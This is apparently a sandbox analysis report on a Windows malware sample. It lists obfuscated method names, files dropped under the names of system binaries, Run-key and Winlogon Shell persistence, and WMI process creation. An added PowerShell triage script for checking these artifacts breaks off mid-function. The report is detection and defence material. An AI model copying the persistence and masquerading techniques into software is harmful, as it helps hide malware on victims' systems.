Source: 4si9noTBNw.exe, G9n8A0rsAFAZ6lbZRXu.cs | High entropy of concatenated method names: 'qkqbUwpPxS1', 'eoObKQyk5uV', 's90dv0b0hPw1wbgbqtM2', 'hkOK7ib0QGUr0YbH2KpY', 'qkVQr6b0wnDXVHMiNvvn', 'Mq0YHbb0B5Um1QC0yQjV', 'AdxxjGb0pBE4iMUGpeaZ', 'O5VbOMb05kSKPImBdEA2', 'imethod_0', 'eoObKQyk5uV'
Source: 4si9noTBNw.exe, i3W3LBSkDd55KwsAydR.cs | High entropy of concatenated method names: 'y3qaWTbeJcH6v0y4lGeh', 'JIyTaqbe7iXFuesZ5DAR', 'bwbm5ZbeyiQ2rcc3JZN3', 'NgaOdRbe9ca4WMVqFyCR', 'zmwSeWTkoN', 'Mh9', 'method_0', 'Nm0Sr2bhrl', 'mxiSg55kLc', 'TBLSagasKk'
Source: 4si9noTBNw.exe, aCwFj0l3TwnouTDEHyb.cs | High entropy of concatenated method names: 'RHollSFhUp', 'aHiO2tb8fcQ2iZJfTVgK', 'fvwfCob8MEpi6NcSpLMW', 'bdkN7Ib8OJ6YlMaFDbOx', 'W0iudsb82bVs40k57gMR', 'po4D21b83bm3wvZYwmAf', 'dIyl7YNAF2', 'qboyJdb8UCgATROFhgvZ', 'oCY7Lxb8KFCnIw0Wvflf', 'jE317Zb86p2nhFBeKUtw'
Source: 4si9noTBNw.exe, EPxQAYWEvhwoQ6vIq9q.cs | High entropy of concatenated method names: 'MsrWqDRnSa', 'fsjWzuQmag', 'S2mD4CoBvX', 'UTVDbrOf97', 'ssdDnbJmlq', 'rPVDPd9CFH', 'Rpx', 'method_4', 'f6W', 'uL1'
Source: 4si9noTBNw.exe, XBfD69peAHvVY8UF3TT.cs | High entropy of concatenated method names: 'F5cpgC6QtW', 'VMMpaihse5', 'AH4p0IBrBO', 'ptwpEHe1kF', 'rSSpLxprAI', 'N4EdFybVItwTjZuLoJXR', 'OZxctPbVPgVeAoweEerT', 'YwBbp2bVdLxMVrHE4bCe', 'VXuc6QbVKPCpBoOnT6Bs', 'ia0CQhbV6i5VsD11OlY0'
Source: 4si9noTBNw.exe, v7JLgfmnZhPs34xuq6g.cs | High entropy of concatenated method names: 'ne0mdA7LSt', 'yRbmIEZZDn', 'OvQmKVVwqJ', 'dBhm6LkvXF', 'WrGmURAhc2', 'tLImmXLTsQ', 'JrImOCqrmb', 'p4Vm2jVAEY', 'VrYmfEpQvn', 'XRNmMUClx8'
Source: 4si9noTBNw.exe, pFe3gJi7QqdnIyqQXqb.cs | High entropy of concatenated method names: 'qIP0CYbGS7IbdQFM2KkJ', 'tWvnYhbGCSBwGvUWHS2K', 'dLpkSvbGDSlWbdsrIhFN', 'CFGbfYbGuB9JLWNx99Qa', 'method_0', 'method_1', 'SaPiJlYmUG', 'O57i9uhMvZ', 'Wmyi10dK5U', 'cKTilbcRt9'
Source: 4si9noTBNw.exe, DcGrRehNDCbMvGpdtfx.cs | High entropy of concatenated method names: 'a99', 'yzL', 'method_0', 'method_1', 'x77', 'dVwhZjeAFT', 'T7phFnYpV3', 'Dispose', 'D31', 'wNK'
Source: 4si9noTBNw.exe, xUhT9qXM0nWka4MFgaY.cs | High entropy of concatenated method names: 'NIRYbdvk1M', 'reBxUpbNGTKUVrs18JSw', 'CjiNrYbNcihvw5Qijmkk', 'olgn64bN8HBwk0UyRjNH', 'WyaXHyRnqi', 'qjDX7Fnnvk', 'AR0Xy0SUk8', 'eieXJVsd9W', 'jurX9qf6hf', 'aO7X1P3grh'
Source: 4si9noTBNw.exe, tAtdmM5W5cvLE9vcrdi.cs | High entropy of concatenated method names: 'DB4', 'method_0', 'method_1', 'method_2', 'method_3', 'method_4', 'method_5', 'A47', 'fC4', 'aK3'
Source: 4si9noTBNw.exe, dZixGWxCMVqAxEPgteI.cs | High entropy of concatenated method names: 'Dispose', 'MoveNext', 'get_Current', 'Reset', 'get_Current', 'GetEnumerator', 'GetEnumerator', 'vheFywbeTfih2wuXOEZY', 'nD6F9AbeGSI422oZVnjN', 'mUXywJbeNshoqSB3N3Fb'
Source: 4si9noTBNw.exe, WnFSh4INGesn0Omfn7P.cs | High entropy of concatenated method names: 'eVxIt4m1Sw', 'Mh6734bDMdk7Q4T0s3SX', 'hbwrZ9bD20OdhrpDkS0M', 'T1BmmFbDfF4fiJiiv8kW', 'U1J', 'P9X', 'lwrbd73vLcG', 'Rahbdyxq8CR', 'otLbU6wlWZg', 'imethod_0'
Source: 4si9noTBNw.exe, kIAlNYWUsQJGa2nLW77.cs | High entropy of concatenated method names: 'KZtWOLgFKt', 'QPGW2Alo4d', 'method_0', 'method_1', 'I27', 'c6a', 'C5p', 'nQlWfvROgn', 'method_2', 'uc7'
Source: 4si9noTBNw.exe, kQ9UZVwWXV7agOcR8a5.cs | High entropy of concatenated method names: 'method_0', 'NuGwuu0QHN', 'bchwSKy7m1', 'kinwCIUgRH', 'mArwx0ooHF', 'Xf8wsXK7ZB', 'PPGwRqhBc7', 'NFEyWjbZRkv6YQXwgQKV', 'N2XAOPbZxKXRxED7nbvC', 'pyywD7bZsDEq1Nldo5Tp'
Source: 4si9noTBNw.exe, JDkuhaDiPkWdZ2SEtBM.cs | High entropy of concatenated method names: 'Owtu33OWC8', 't5NhQ5bjdZIqj0CIUAIb', 'uW0eI3bjnUdfxSrM4nNs', 'wwZfDJbjPG5V2iHAjreW', 'kt5', 'KT4DvkbRak', 'ReadByte', 'get_CanRead', 'get_CanSeek', 'get_CanWrite'
Source: 4si9noTBNw.exe, xS6C9lUo50S81M07MXT.cs | High entropy of concatenated method names: 'lB8U5s894e', 'xaaUB0T26l', 'ipHUWKPF50', 'RnAUDQmSTi', 'ps2UuoqANl', 'XKAUSqA35i', 'HM8Mc2bSzEfZNgRQukW0', 'NJHfrybC4sJDK6thAisa', 'hvyU7UbCbU0VTbyXw7VB', 'YaVL5GbCnEUS92xVGBBw'
Source: 4si9noTBNw.exe, XbT34TuCsvxNAZbQb5w.cs | High entropy of concatenated method names: 'Close', 'qL6', 'y7QusY0rbS', 'gXFuRuV5JA', 'vAkuA5pFTE', 'Write', 'get_CanRead', 'get_CanSeek', 'get_CanWrite', 'get_Length'
Source: 4si9noTBNw.exe, Xr4BZ6I7w1uuAm4o5wd.cs | High entropy of concatenated method names: 'ODYIoOJGI1', 'aWHIp2pBt2', 'kDWI5Y5VE9', 'CGiZBtbWt3Zg68vnOBIg', 'Oc8iwobWFdur72dcf72q', 'fP0dZGbWVnTXkvaqrDil', 'V4YLJ5bWkeVXr1qLQ6HE', 'YXhIYp54Rg', 'QnwIhH9I1L', 'BdRlqQbWT47vxoDfeRWB'
Source: 4si9noTBNw.exe, dYaZBM6mcwuESxyln3F.cs | High entropy of concatenated method names: 'uc262XAbkT', 'lJS6feBXrl', 'kBhXLJbuY7AiVqnb3UwX', 'HB1WUxbuXCSA6PIQsZkn', 'E9lPsrbuvmOeg4cws7WB', 'YHCKOZbuh5CwrGYxLpQG', 'lUwYFFbuQwWxc2Xsl0dt', 'XKkUr3buw7W1IEqgDXTl', 'cWus8Tbuob8yN656sClv', 'bMHw04bupDKoxIsTwPmH'
Source: 4si9noTBNw.exe, oEc3ue613FL3MvSTJNo.cs | High entropy of concatenated method names: 'wLR6peSRWx', 'lTgo5UbueuYgZKAaBlNI', 's9wrvLburByRM9SDc1Jt', 'HCLf38bukM07UsfxBCaG', 'ckNWyrbujUndnXrs5g4V', 'GxJ5c6bugZW8JqVmLYvj', 'Rod6iaNMc7', 'Lv56XR5jcc', 'IMF6vIrYjo', 'Ksw6YKxUYb'
Source: 4si9noTBNw.exe, nHX2MEukIVWBufLdnru.cs | High entropy of concatenated method names: 'OgLuef1seM', 'k6r', 'ueK', 'QH3', 'z24ur4scfh', 'Flush', 'NnHugN377k', 'SOOua8LqA3', 'Write', 'vpvu0XF7e2'
Source: 4si9noTBNw.exe, c8ku1w5cBq4jZTbFAC1.cs | High entropy of concatenated method names: 'bi25GZimTN', 'ypF5NR1Rj7', 'BKC5T9yco8', 'XQK5ZsHTKh', 'AVZ5F6S9ea', 'FSP5VkQspD', 'CSs5tZN4vQ', 'Oyw5kMnvia', 'CWQ5j2aB8F', 'ORX5es4Js8'
Source: 4si9noTBNw.exe, qHDvmF0J95Squ092xQv.cs | High entropy of concatenated method names: 'M2qKr1bLi6jNgXhG3Pm2', 'U0B6rebLXWVrBEwy46Sh', 'ciFErc26Ll', 'JJJyFibLQhEFQ8xhlHKi', 'Esmg84bLwoDyVsXBmTvm', 'vihpPYbLoCdks3k6vjUf', 'yAiyD8bLpvRnyVk3dyCH', 'P3APSCbL56NO5ghL4IVw', 'Rh0KuIbLB6HJt3p3hj7l', 'Q49IiibLWrHkc60i6rAU'
Source: 4si9noTBNw.exe, mq5cUCL9gTpdAFriRFq.cs | High entropy of concatenated method names: 'mvmL5qZyqZ', 'GR5LBxpIel', 'L9JLWUIJ0c', 'idLLDyS1ld', 'bYjLuIoNH1', 'Iq8LSWZa9N', 'T0WLCdaU8A', 'bZrLx0bj3N', 'HZXLsn2ymD', 'nLVLRrsWel'
Source: 4si9noTBNw.exe, UK5OS5HvBbSStYmCNhE.cs | High entropy of concatenated method names: 'gRI1MpCxpn', 'tvR13UT6uZ', 'CwpMGUbcbXXD6b3TbHbI', 'kD6tsVbAz89mOjJTd0Q8', 'fp8acdbc4KiYF7rp2NOF', 'dGnvribcnukb3qMi9JrF', 'HDD9kybcPeNqu2FqQBc4', 'vcb11wA26m', 'mC5l00bc6Ob4wZAmBtZV', 'cGfSaWbcIIflVWituDWX'
Source: 4si9noTBNw.exe, w1nFLcYORxmNsmj3ISS.cs | High entropy of concatenated method names: 'ySuYWGpfsi', 'OxUYfnDaUo', 'cAgYMbEHcP', 'SZoY3qiyqI', 'loWYHapj0h', 'vcIY75Dhew', 'wqWYymckyF', 'BgjYJCBCsK', 'fEBY9VHbVA', 'KksY173U26'
Source: 4si9noTBNw.exe, WdXmT4Bq5GMXSXAR5aP.cs | High entropy of concatenated method names: 'rsVW4QitoU', 'Y3NWbg1rp6', 'Yd7', 'OpdWnyneJM', 'l4iWPCcO9r', 'blqWdVsL1T', 'adSWIBZPT5', 'AR7JOIbkOTlj8vdleLtE', 'ttMmhobkU6RflL3MVqFJ', 'Pa7F7VbkmYSK4fIiUXi6'
Source: 4si9noTBNw.exe, s755HHdQpQTvXoYuwE9.cs | High entropy of concatenated method names: 'VZq', 'KZ3', 'XA4', 'imethod_0', 'e23', 'xqabUPaOhiU', 'b3Obdbm8D8P', 'RbwIEDbBDHBsMyeSQLNc', 'k87y9cbBuG9Zd4XsJsAV', 'OPv9bDbBS7BqcMcjxi9j'
Source: 4si9noTBNw.exe, i23bCaImM3FiHMs6XI0.cs | High entropy of concatenated method names: 'Rpx', 'KZ3', 'imethod_0', 'vmethod_0', 'mx8bUIOpmnY', 'b3Obdbm8D8P', 'l1XqmNbWYw6tbOSDupcw', 'I33laVbWh9IuExxh7xkX', 'AHYtwpbWQFOIyHHRdW6h', 'MvnwOBbWw0r5Scm064xn'
Source: 4si9noTBNw.exe, exkhVEUO6n2eCNoAhev.cs | High entropy of concatenated method names: 'jIQUfnOBdL', 'lWnUMhEUDF', 'aQcU3FZV6i', 'iTZtTDbSp0aWoQ1l1gZ4', 'Xl0OW5bSweWwnmJ2JXm4', 'sVi5HobSoVhXKASpqNcU', 'QRGWB3bS5TJDmKBFtWrG', 'sYMw1xbSBoqQID0HG25y', 'klpLAMbSW1wi9vWc7wEg', 'GliNLRbSDDJ9tA8I3dor'
Source: 4si9noTBNw.exe, devr50pZQ85kOqWOfsC.cs | High entropy of concatenated method names: 'lGfpVEUqc1', 'HSMptRV1sV', 'EKupkIh8yW', 'DC98x7bFLHu3NHsjxYAw', 'zryaUMbF0Moe3y9vJG7c', 'hNnNJrbFEs1KuDlRMJ8C', 'VqbnFTbFqLihx1kKoii1', 'tuHxHVbFz7wVHFtKC6B6', 'fngOBkbV4D38sqGcZKZ3', 'X378subVbvSRrqDWoiuY'
Source: 4si9noTBNw.exe, aTMRHYRTKLTveGkebx5.cs | High entropy of concatenated method names: 'IHqbUhS0BBF', 'V1lRFT1tiL', 'yTXRVPLS2G', 'pltRtXjJN5', 'WbV6cabr8hdpHZjWDKoc', 'D19gjdbrGDLs9I3G4NHh', 'd2ZeHvbrNfmpIjV1ZW12', 'Bjb8bLbrToUaBCFwGn16', 'GvbabtbrZqWa1LlCnt6h', 'dVNUnLbrFaZbE8gvo5Nk'
Source: 4si9noTBNw.exe, qZkXtQQYly7orSFlBuq.cs | High entropy of concatenated method names: 'UIsQQwFpAd', 'j7DQwMNyea', 'qWCQokUHBu', 'NhlQp1MKKW', 'TAtQ5Pmotv', 'xttCtIbZmno0D1OGHEmB', 'gjxF2SbZ66McxlABi8QE', 'J1qFkpbZUp8mrPcFAxUV', 'zWDaQ1bZOpneMesSjR0G', 'eEkK11bZ2dl42FooyJpS'
Source: 4si9noTBNw.exe, sNS8OEaWkVg5r78UVE4.cs | High entropy of concatenated method names: 'N0fauVsXQj', 'I78aShYnI6', 'iwDaChDZsW', 'J3FaxHIdUW', 'Dispose', 'YtgGCZbEu0gGlvcDx8h3', 'qRaecMbES31XO5s1Uadb', 'i73NBpbECSYREQJxMPKQ', 'Vq9kcEbEx5DH8kNdjX7G', 'MupVa0bEsVcrGJNNePbd'
Source: 4si9noTBNw.exe, bLlsVg5U0b9kkMMYwf0.cs | High entropy of concatenated method names: 'dSD5OrUJLT', 'tUp52Ucnu8', 'aSS5fNTj8Q', 'yudvfrbViq1DZDstnDZw', 'EnDuMPbV11m9DALfSoaF', 'UFeNTkbVlXkCoQJvpZJR', 'rG9818bVXt99asAguC2r', 'xcywh5bVv3N59lTMgHXF'
Source: 4si9noTBNw.exe, Pc8anUdAnCpDbgdaux4.cs | High entropy of concatenated method names: 'R3AdLySl5F', 'jyboqjbW2XBC850y9Vf6', 'XZMtFibWfkgaRW1CEDOi', 'YqZridbWm2Uv5Rr996HJ', 'HFPS5nbWOLLvfOrJCGUG', 'BAatkJbW39yIUIdvwguE', 'fVqg6SbWHXrLvZ4ZKDfH', 'z3u69VbW7erJqNPLnVAp', 'FPXIKXU3Ff', 'WcT4TabW1nyI4iWUbSVy'
Source: 4si9noTBNw.exe, XfTEA56MAEn0pibsMs3.cs | High entropy of concatenated method names: 'P9X', 'Rc0bdvvHoVy', 'vmethod_0', 'imethod_0', 'uqdTG8buDDyOqsqdrfIS', 'WkoaNTbuB0B2CJe6rZHd', 'waoM3lbuWni9cYrUc7PE', 'Y2peAJbuuJoyenhD0jgJ', 'W9EJaIbuSsKyuHFi4WkU', 'pMhCv4buCk0jnsrDx8ZX'
Source: 4si9noTBNw.exe, xWFdtBKhISLiadldGS0.cs | High entropy of concatenated method names: 'dnBKWfA0Mh', 'jhdrMObDVDjE4klqmWrw', 'PqUsZDbDZHUL2VSNoLbE', 'z9ZPpHbDFZoRcNCYup3B', 'mwMYb5bDt1UGnec0hhUK', 'E94', 'P9X', 'vmethod_0', 'a77bdlNbLB5', 'KRVbUmrjJVx'
Source: 4si9noTBNw.exe, nYHJ2QmY2gKQjF75k8S.cs | High entropy of concatenated method names: 'ouGwC5bskxre0RhpNH0f', 'QF0hmIbsjTL2fWNN2l8h', 'd9a3qY4l8M', 'dOGxSqbsaYKNT2EOQhD3', 'TZeflabsrlf5r0Qi9CAF', 'sfFRgsbsgqiSQdce7OyQ', 'Stahc0bs0m7iBY9orVUb', 'vZEMKWbsEj6fteh4V6Qm', 'iCHHbHBvxl', 'tEpVvdbR4UBju4RwXU77'
Source: 4si9noTBNw.exe, igrYyI1r1tjnI4HpVoF.cs | High entropy of concatenated method names: 'm1I', 'G4q', 'w29', 'jnObUMxm20c', 'avMbdZIwUjD', 'Bgnk6gbc8oHRtp838dcM', 'ALA9TPbcGTGJQVqKvkCa', 'u6YeOGbcN5iuxbpSnqSb', 'zjSQgNbcT57txjpIN1yW', 'R71WHvbcZrEofYYHtOWt'
Source: 4si9noTBNw.exe, X6jkY6BT2lBlFy7kCW4.cs | High entropy of concatenated method names: 'HULBFSjL4V', 'btsBVQ7lDp', 'J0ABtUVDhY', 'OeyBkbu6vA', 'TtRBjJr5Yd', 'HQALHQbtLKRiX3vhdaLX', 'HrqQGabtq4YvDImfOA2v', 'YF3w61btzLrGC3Sd6aCL', 'XfbpHubt0Q9sSBuCDmvs', 'aKfAvabtEmTjuCUx9nbf'
Source: 4si9noTBNw.exe, VUgsBHISUExAOLUQhEe.cs | High entropy of concatenated method names: 'l29', 'P9X', 'vmethod_0', 'LMwbd2pFLMe', 'h24Ixo8o1L', 'imethod_0', 'fEYxXmbWeYUN5BQVTekc', 'ds0wMBbWrnU1ZaQMwCPe', 'C0rUbobWgaYywEeWTr4c', 'VFS9JJbWaNqJ7PrKOREx'
Source: 4si9noTBNw.exe, M2vxprlRESRyCyyr6nM.cs | High entropy of concatenated method names: 'N2N', 'GsxbUHqRMjt', 'TMblclHFKy', 'XZSbU7Cvoc4', 'chWgiBb8DCJThPoU0eKE', 'y9Ilk6b8uwAl3gM4iOPU', 'akSHh7b8BdvTC5jbufao', 'ddas5Ub8Wom0AIlrKgba', 'stcslRb8SKH5NwRKS01B', 'IO4wh5b8CyygdF5CQ8K9'
Source: 4si9noTBNw.exe, Bpr2BUnlbPsn6tabHbe.cs | High entropy of concatenated method names: 'UPjnXWn6eO', 'FiXnvwagEi', 'Qm3CY4bpoYKqxDnnDGk6', 'hHYpp1bpQKrnfs3xSBpy', 'SiMym5bpwlG4kHZeNGkH', 'eN1fePbppOCDBHagSAHT', 'EgdSlBbp5NdmkU3sBKVn', 'PLxP0XbpB7n2Mil5qiBO', 'vQm28cbpWnVxmr6Yyhge', 'puvTtVbpDglEIMO5aAbd'
Source: 4si9noTBNw.exe, zVn3jelaEra36uJLPdf.cs | High entropy of concatenated method names: 'w52', 'o38', 'vmethod_0', 'iHWlEYOnXG', 'GjGbU9PVZEy', 'H7rhIAb8aEwXgHh2FwSd', 'r2uesBb8r4TIJg8gmJRp', 'tXsnhOb8gIF1AuNI5MFm', 'tVDOIob80lK9sonWr9rc', 'jGp6sEb8E5abYw96t5Qb'
Source: 4si9noTBNw.exe, a6rLn8i2je1HGHZjrwB.cs | High entropy of concatenated method names: 'Rrr', 'y1x', 'ok6bUXV7AUW', 'y82bUvGpOJ5', 'osrj78bGfL42REPeXjD1', 'iZnibjbGMB0X7a1ZDkfm', 'p5a24DbG3vuqtjlagoUd', 'Eal5XWbGHZaNyp2S4Dw3', 'Q6VFxObG7VaK30rtqsEU', 'qxgieUbGyVPm3Rs9Q04b'
Source: 4si9noTBNw.exe, HsIB8XbqSEpwb5HQVZT.cs | High entropy of concatenated method names: 'KZ3', 'fW4', 'imethod_0', 'U7v', 'PHrbUb8NgQp', 'b3Obdbm8D8P', 'XY8tHBboz0S8DNghsf7w', 'wCoJbrbp48mX0oqYlpdv', 's019IRbpbX7k6VIOntwK', 'ubCd6hbpnoDfOC0GE4hD'
Source: 4si9noTBNw.exe, hNmGcjnWuBwgG4TaA1J.cs | High entropy of concatenated method names: 'gPMn84vLUI', 'z57nGMZEPD', 'HLwWYebp8GXYvELDUjLR', 'cXSR6WbpASdXy3rQv698', 'MBli4XbpcCLJ0EirYyut', 'h56qUnbpG6ZMyu72To2E', 'VbinFFWl8f', 'VrhWNybpTDH59T5KDiPx', 'jvR2L2bpZjf6PZlmRq6Q', 'KY6qE1bpFA3j1qLdLMpj'
Source: 4si9noTBNw.exe, auDqZ504ahmB8YKhbCs.cs | High entropy of concatenated method names: 'Nns0d4qdJV', 'T5V0IQXf71', 'PRbqGNbLPAhtpv3esV5y', 'bwOWgLbLdf2lSxlvY0Vm', 'IVmMUebLb33xRGVvZluq', 'ab4OJ4bLnmR6MGtbWScb', 'fbXBDLbLIq9Z7vH07t91', 'wdNXIWbLKlqp4EPAnO29', 'kEB0nCdm4o', 'uZAAxtbELgDnPjdHiCmW'
Source: 4si9noTBNw.exe, EOkjgwaMgaPg453Paua.cs | High entropy of concatenated method names: 'iPsa7G6uTw', 'Lf2a11gc4k', 'c2maXrB7Ku', 'mYvavf6qNv', 'VaiaYAB9Em', 'pDEahaTuEO', 'IM9aQ96huP', 'wtiaw80H6x', 'Dispose', 'QAuie2bEoIF47hqDmcXy'
Source: 4si9noTBNw.exe, JeU0gcLAAXG4IMMUDjl.cs | High entropy of concatenated method names: 'pMFbKDrBggV', 'gLibKuaDXFa', 'eVtbKS1AHWT', 'svrbKCYVbLJ', 'yRebKxUvNbt', 'EGQbKsoWlik', 'sMpbKRF20Ka', 'q2DqIsN4ss', 'T6XbKAO9pQu', 'wmTbKcSTJp7'
Source: 4si9noTBNw.exe, R3SxwQRWpBQ8UJpuGvO.cs | High entropy of concatenated method names: 'dqkRue3OWe', 'nwbRSnRtaj', 'H1TRCx58BI', 'LXHRxbMA92', 'PbkRsfIbB4', 'n0qRRAONde', 'aZJRASC3No', 'M53RcCcODN', 'GhwR8fQvQb', 'SrFRGqBrkG'
Source: 4si9noTBNw.exe, DZTwLupqmEQneagKYE0.cs | High entropy of concatenated method names: 'SMj54Ex8W5', 'SvC5bDWhPB', 'nTv5nbPbya', 'NFc5PNb1Xo', 'FQm5dcYOsu', 'eIT5IRuUZY', 'g6UZxDbVMTFkZEfk2YpQ', 'eST7isbV2Y89SJNPMFd7', 'HFanchbVf3bCTUrLByHf', 'Pt4bJxbV3VVYdkLYauqY'
Source: 4si9noTBNw.exe, KULE0rAWN9ZujanSfHO.cs | High entropy of concatenated method names: 'Q1nAueH0BB', 'hrLASB7BV6', 'OlBACscp1W', 'TRgAxdSO70', 'gEjAsiYH8D', 'JYAARBOpZ6', 'vSsAApFXHX', 'otMActFAS5', 'c2WA8XaSX9', 'bl6AGSNgS5'
Source: 4si9noTBNw.exe, rcZ3xnoP8aNA0dMsIPS.cs | High entropy of concatenated method names: 'method_0', 'YU8', 'method_1', 'method_2', 't0ToI6ib9M', 'Write', 'd6ZoKKx7KO', 'HTno6IsDdD', 'Flush', 'vl7'
Source: 4si9noTBNw.exe, wpuioCbrL3yE90PkSdk.cs | High entropy of concatenated method names: 'P9X', 'nlabaeJTFf', 'PRwbU407uxA', 'imethod_0', 'o01b0IKNQx', 'tBJkIvboghjjv1jXn2c6', 'BoW0tgboaolAVexGZZik', 'gSpTSdboeYyYOYCaycMD', 'NUVjkUborcPB6gbMBZJ2', 'd1OD5Cbo0BDUKlULISsB'
Source: 4si9noTBNw.exe, AWiGJVPkeR19qtmQDPE.cs | High entropy of concatenated method names: 'eDBdPGvwwQ', 'pEFdd0J6rk', 'uUEdIJYt6T', 'gJDa58bBfP3xjKP4anS7', 'wvgoqRbBOpI1LXmP1JOQ', 'AgHvksbB2TM4yrkYhT7t', 'aYDd2hRnGZ', 'gCxrJEbB7m8UeibCXaib', 'jZ3JJIbB37FYffYKRlv6', 'nlEC8DbBHXOFu01gxkQM'
Source: 4si9noTBNw.exe, uNgXnZA01cfOCuKYw2N.cs | High entropy of concatenated method names: 'e64ALun2KV', 'GopAqlkiJl', 'qZsAzPfr0O', 'vgFc4UmfEZ', 'ERKcbdCRIg', 'l26cnWANt4', 'xJKcP3Iurw', 'TNkcdPIR61', 'iZVcIYZIHh', 'ffmcK7JYZm'
Source: 4si9noTBNw.exe, x8GyWym3dXFv5kVJ1ls.cs | High entropy of concatenated method names: 'q76', 'method_0', 'p9e', 'hkB', 'method_1', 'method_2', 'PgXfNrbCcniCw0CuURJ6', 'Qd5DHmbC86wm9eanGyf1', 'M2tfuCbCGPbCJbcwRiUd', 'f8QrLFbCNKM0HC9SjuvM'
Source: 4si9noTBNw.exe, IXip9H6WwHkM7v08KL3.cs | High entropy of concatenated method names: 'SGV6u0Gcfs', 'm8g6SIyCRr', 'OkxKu7buLx51QkkwALAM', 'MpK4YWbu0CDIhjNMt8m0', 'yD5edVbuE9cdJxslqvBl', 'DbSykPbuqcLcq0iK8r4I', 's1rf6qbuzWVrFjJEnY0t', 'Nu6Yq2bS4fSQUTFpov5v', 'KCpvYqbSbs0KQqUH964f', 'KcOMyYbSnyx7QKBnLGW3'

                            Persistence and Installation Behavior

                            Source: C:\Users\user\Desktop\4si9noTBNw.exe | WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create (18 times)
                            Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe | System file written: C:\Windows\System32\SecurityHealthSystray.exe
                            Source: C:\Users\user\Desktop\4si9noTBNw.exe | File created: C:\Recovery\VTixufCejPQZEvXiB.exe
                            Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe | File created: C:\Windows\System32\SecurityHealthSystray.exe (2 times)
                            Source: C:\Users\user\Desktop\4si9noTBNw.exe | File created: C:\Users\user\Desktop\xWYkXXxo.log (2 times)
                            Source: C:\Users\user\Desktop\4si9noTBNw.exe | File created: C:\Program Files\Windows Defender\en-GB\conhost.exe
                            Source: C:\Users\user\Desktop\4si9noTBNw.exe | File created: C:\Users\Public\AccountPictures\winlogon.exe
                            Source: C:\Users\user\Desktop\4si9noTBNw.exe | File created: C:\Users\user\Desktop\hEXMkWTV.log (2 times)
                            Source: C:\Users\user\Desktop\4si9noTBNw.exe | File created: C:\Users\user\Desktop\OuwhFfWF.log (2 times)
                            Source: C:\Users\user\Desktop\4si9noTBNw.exe | File created: C:\Users\user\Desktop\exZDPEZZ.log (2 times)
                            Source: C:\Users\user\Desktop\4si9noTBNw.exe | File created: C:\Program Files (x86)\AutoIt3\VTixufCejPQZEvXiB.exe
                            Source: C:\Users\user\Desktop\4si9noTBNw.exe | File created: C:\Users\user\Desktop\JzShoUtR.log (2 times)
                            Source: C:\Users\user\Desktop\4si9noTBNw.exe | File created: C:\Program Files (x86)\Java\VTixufCejPQZEvXiB.exe
                            Source: C:\Users\user\Desktop\4si9noTBNw.exe | File created: C:\Users\user\Desktop\hMjNZkhU.log (2 times)
                            Source: C:\Users\user\Desktop\4si9noTBNw.exe | File created: C:\Users\user\Desktop\YdQxpHbm.log (2 times)
                            Source: C:\Users\user\Desktop\4si9noTBNw.exe | File created: C:\Users\user\Desktop\nocldQFM.log (2 times)

                            Boot Survival

                            Source: C:\Users\user\Desktop\4si9noTBNw.exe | Key value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon Shell (6 times)
                            Source: C:\Users\user\Desktop\4si9noTBNw.exe | Registry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run winlogon (3 times)
                            Source: C:\Users\user\Desktop\4si9noTBNw.exe | Registry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run VTixufCejPQZEvXiB (5 times)
                            Source: C:\Users\user\Desktop\4si9noTBNw.exe | Registry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run 4si9noTBNw (3 times)
                            Source: C:\Users\user\Desktop\4si9noTBNw.exe | Registry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run conhost (3 times)
                            Source: C:\Users\user\Desktop\4si9noTBNw.exe | Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run VTixufCejPQZEvXiB (6 times)
                            Source: C:\Users\user\Desktop\4si9noTBNw.exe | Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run winlogon (2 times)
                            Source: C:\Users\user\Desktop\4si9noTBNw.exe | Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run conhost (2 times)
                            Source: C:\Users\user\Desktop\4si9noTBNw.exe | Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run 4si9noTBNw (2 times)
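The registry and file artifacts recorded in the two sections above can be checked directly on a suspect host. The PowerShell triage script below is an added example; it is not part of the Joe Sandbox report and not code from the sample. It takes the Run value names, dropped-file paths and the Winlogon key from the report, and assumes (the report does not show what value the sample wrote) that the legitimate Shell value is the Windows default, explorer.exe. Because processes started through WMI's Win32_Process::Create run as children of WmiPrvSE.exe, the script also lists any live process with that parent, which is how the 18 ExecMethod calls above would appear on a running system.

```powershell
# Added host-triage example; not part of the Joe Sandbox report or the sample.
# Paths, Run value names and the Winlogon Shell key come from the report.
# Assumption (not in the report): the Windows default Shell value is "explorer.exe".
# Run from an elevated PowerShell prompt on the suspect host.

function Get-PersistenceFindings {
    $findings = New-Object System.Collections.Generic.List[string]

    # 1. Winlogon Shell. The report shows the sample rewriting this value;
    #    whatever it points at is started as the user's shell at every logon.
    $winlogonKey = 'HKLM:\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon'
    $shell = (Get-ItemProperty -Path $winlogonKey -Name Shell -ErrorAction SilentlyContinue).Shell
    if ($shell -and $shell -ne 'explorer.exe') {
        $findings.Add("Winlogon\Shell = '$shell' (default is 'explorer.exe')")
    }

    # 2. Run values under HKLM and HKCU, by the names the report lists. 'winlogon' and
    #    'conhost' borrow system-binary names; the other two are specific to this sample.
    $runNames = @('winlogon', 'conhost', '4si9noTBNw', 'VTixufCejPQZEvXiB')
    foreach ($hive in 'HKLM', 'HKCU') {
        $runKey = "${hive}:\SOFTWARE\Microsoft\Windows\CurrentVersion\Run"
        $props  = Get-ItemProperty -Path $runKey -ErrorAction SilentlyContinue
        if (-not $props) { continue }
        foreach ($name in $runNames) {
            $entry = $props.PSObject.Properties[$name]
            if ($entry) { $findings.Add("$runKey\$name = $($entry.Value)") }
        }
    }

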